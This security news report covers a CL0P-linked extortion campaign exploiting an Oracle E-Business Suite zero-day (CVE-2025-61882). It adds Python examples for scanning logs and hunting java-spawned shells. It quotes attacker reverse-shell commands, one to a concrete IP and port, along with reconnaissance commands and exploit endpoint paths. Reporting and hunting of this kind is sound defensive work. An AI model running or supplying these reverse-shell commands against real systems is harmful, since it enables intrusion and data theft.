CL0P Extortion: Google/Mandiant Expose Zero-Day RCE in Oracle E-Business Suite (CVE-2025-61882)

Google Threat Intelligence Group (GTIG) and Mandiant have jointly disclosed an extensive data theft and extortion campaign targeting Oracle E-Business Suite (EBS) environments, linked to threat actors claiming affiliation with the CL0P extortion brand.

The campaign, which began in late September 2025, has already impacted multiple organizations, leveraging what appears to be a previously unknown zero-day — CVE-2025-61882 — in Oracle EBS.

“Beginning Sept. 29, 2025, Google Threat Intelligence Group (GTIG) and Mandiant began tracking a new, large-scale extortion campaign by a threat actor claiming affiliation with the CL0P extortion brand,” the researchers stated.

The operation kicked off when executives across multiple industries began receiving extortion emails claiming their Oracle EBS environments had been compromised and sensitive data stolen.

The threat actors — allegedly tied to CL0P — used a high-volume email campaign, sending messages from hundreds of compromised third-party accounts to lend legitimacy and evade spam filters.

“The actor began sending a high volume of emails to executives at numerous organizations, alleging the theft of sensitive data from the victims’ Oracle E-Business Suite (EBS) environments,” GTIG noted.

These emails referenced real file listings exfiltrated from victim systems, providing convincing proof of intrusion. Recipients were directed to contact [email protected] or [email protected], both addresses long associated with the CL0P data leak site (DLS).

“To substantiate their claims, the threat actor has provided legitimate file listings from victim EBS environments… The extortion emails have indicated that alleged victims can prevent the release of stolen data in exchange for payment,” the report explained.

As of publication, no victims from this Oracle-focused campaign have yet appeared on the CL0P leak site — a typical delay tactic that mirrors CL0P’s pattern in previous ransomware and data extortion campaigns.

The technical investigation revealed that the CL0P-linked attackers exploited Oracle EBS zero-days months before patches were available. GTIG and Mandiant traced the earliest exploitation to July 10, 2025, predating Oracle’s critical patch updates by several weeks.

“The threat actor(s) exploited what may be CVE-2025-61882 as a zero-day against Oracle EBS customers as early as Aug. 9, 2025, weeks before a patch was available, with additional suspicious activity dating back to July 10, 2025,” the report revealed.

Initial intrusions involved the /OA_HTML/configurator/UiServlet endpoint, where attackers used a combination of Server-Side Request Forgery (SSRF), CRLF injection, authentication bypass, and XSL template injection to achieve remote code execution (RCE).

The exploit flow involved executing commands such as:

bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1

providing attackers with interactive shell access on compromised systems.

Mandiant observed partial overlap between this exploit and one later leaked in a Telegram group named “SCATTERED LAPSUS$ HUNTERS.”

By mid-August, the threat actor shifted tactics, exploiting a vulnerability in the SyncServlet component to perform unauthenticated RCE via malicious XSL templates stored in Oracle’s internal XDO_TEMPLATES_B database table.

The exploit chain used:

/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG

— a strong indicator of compromise.
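The two request paths the article names (the UiServlet endpoint and the TemplatePreviewPG page) can be hunted for in web-tier access logs. The following is an added example, not code from the GTIG/Mandiant report; it assumes the logs are in Apache combined log format, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request paths named in the article: the exploited endpoint and the IoC page.
UISERVLET_PATH = "/OA_HTML/configurator/UiServlet"
TEMPLATE_PREVIEW_PAGE = "/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG"

# Combined log format: client ident user [timestamp] "METHOD URI PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def classify_request(uri):
    """Label a request URI 'UiServlet' or 'TemplatePreviewPG'; None if it is neither."""
    parts = urlsplit(uri)
    path = unquote(parts.path)  # compare the decoded path so %2F encoding does not hide it
    if path == UISERVLET_PATH:
        return "UiServlet"
    if path.lower().endswith("/oa_html/oa.jsp"):
        # parse_qs percent-decodes the page value for us
        if TEMPLATE_PREVIEW_PAGE in parse_qs(parts.query).get("page", []):
            return "TemplatePreviewPG"
    return None

def find_ebs_ioc_hits(lines):
    """Return one dict per log line whose request URI matches either indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it instead of aborting the scan
        label = classify_request(m["uri"])
        if label:
            hits.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                         "status": int(m["status"]), "indicator": label})
    return hits

# Constructed sample lines (documentation-range IPs, not real indicators).
SAMPLE_LOG = [
    '203.0.113.10 - - [09/Aug/2025:10:15:01 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 200 512',
    '203.0.113.10 - - [20/Aug/2025:03:41:17 +0000] "GET /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG HTTP/1.1" 200 8812',
    '198.51.100.7 - - [20/Aug/2025:03:42:00 +0000] "GET /OA_HTML/OA.jsp?page=/oracle/apps/example/webui/SomeOtherPG HTTP/1.1" 200 2210',
    '198.51.100.7 - - [20/Aug/2025:03:43:00 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in find_ebs_ioc_hits(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} {hit["indicator"]} status={hit["status"]}')
```

Hits on TemplatePreviewPG from unexpected clients, or any POST to UiServlet from outside the expected administrative ranges, should be correlated with the process-level artifacts described later in the article before being dismissed.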

Within these payloads, GTIG and Mandiant identified a sophisticated Java-based implant framework, comprising:

  • GOLDVEIN.JAVA – a downloader that communicates with a C2 disguised as a “TLSv3.1” handshake and retrieves second-stage payloads.
  • SAGEGIFT, SAGELEAF, and SAGEWAVE – modular Java servlets that establish persistent backdoors and deploy encrypted payloads.

“GTIG has identified at least two different chains of Java payloads embedded in the XSL payloads… GOLDVEIN.JAVA, a downloader… and SAGE* payloads that create a persistent filter for deploying additional Java payloads,” the report described.

SAGE* infection chain/trigger diagram | Image: GTIG

Once inside, the attackers performed detailed reconnaissance using the EBS ‘applmgr’ account, executing system and network enumeration commands to map the environment.

Observed commands included:

cat /etc/hosts
df -h
ifconfig
netstat -an
/bin/bash -i >& /dev/tcp/200.107.207.26/53 0>&1

Mandiant also noted bash subprocesses spawned by Java payloads, which are now considered key hunting artifacts for defenders.

“Child processes of any bash -i process launched by Java running as the EBS account ‘applmgr’ should be reviewed as part of hunting for threat actor commands,” analysts advised.
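The hunting advice above can be applied to a process listing. The following is an added example, not the analysts' own tooling; it assumes a snapshot in the shape of `ps -eo pid,ppid,user,args` output, the EBS account name ‘applmgr’ from the article, and a constructed sample listing.

```python
# Constructed snapshot shaped like `ps -eo pid,ppid,user,args` output (not real data).
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
 2210     1 applmgr  /u01/java/bin/java -Dweblogic.Name=example_server weblogic.Server
 3344  2210 applmgr  bash -i
 3360  3344 applmgr  cat /etc/hosts
 3361  3344 applmgr  netstat -an
 4100     1 applmgr  bash -l
 4120  4100 applmgr  df -h
 5000     1 root     /usr/bin/java -jar monitor.jar
 5001  5000 root     bash -i
"""

def parse_ps(ps_text):
    """Turn ps output into {pid: {ppid, user, cmd}}; the first line is the header."""
    procs = {}
    for line in ps_text.splitlines()[1:]:
        fields = line.split(None, 3)
        if len(fields) < 4:
            continue
        procs[int(fields[0])] = {"ppid": int(fields[1]), "user": fields[2], "cmd": fields[3]}
    return procs

def is_java(proc):
    """True when argv[0] is a java binary, whatever directory it lives in."""
    return proc["cmd"].split()[0].rsplit("/", 1)[-1] == "java"

def is_interactive_bash(proc):
    """True for `bash -i` (the reverse-shell form quoted in the article)."""
    argv = proc["cmd"].split()
    return argv[0].rsplit("/", 1)[-1] == "bash" and "-i" in argv[1:]

def hunt_java_spawned_shells(ps_text, ebs_user="applmgr"):
    """Find `bash -i` running as ebs_user whose parent is a java process also running
    as ebs_user, and collect each such shell's child commands for review."""
    procs = parse_ps(ps_text)
    findings = []
    for pid, proc in procs.items():
        parent = procs.get(proc["ppid"])
        if not (parent and proc["user"] == ebs_user == parent["user"]
                and is_interactive_bash(proc) and is_java(parent)):
            continue
        children = [c["cmd"] for c in procs.values() if c["ppid"] == pid]
        findings.append({"shell_pid": pid, "java_pid": proc["ppid"], "child_cmds": children})
    return findings

if __name__ == "__main__":
    for f in hunt_java_spawned_shells(SAMPLE_PS):
        print(f"java pid {f['java_pid']} -> bash -i pid {f['shell_pid']} ran {f['child_cmds']}")
```

The same logic applies to EDR process-creation telemetry: alert on `bash -i` whose parent image is java under the EBS account, and pull the shell's descendants rather than only the shell itself.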

While GTIG has not yet confirmed attribution, significant overlaps exist with historical FIN11 operations — the financially motivated group long associated with the CL0P ransomware and DLS infrastructure.

“The use of the CL0P extortion brand, including contact addresses that have been listed on the CL0P DLS since at least May 2025, is however notable,” GTIG stated.

The GOLDVEIN.JAVA downloader and GOLDTOMB backdoor observed in this campaign closely resemble malware used by UNC5936, a suspected FIN11 subcluster, during prior mass exploitations of Cleo MFT software in 2024.

“The post-exploitation tooling shows logical similarities to malware previously used in a suspected FIN11 campaign,” the report added.

Oracle has since released emergency patches (Oct. 4, 2025) addressing CVE-2025-61882, covering the UiServlet and SyncServlet.
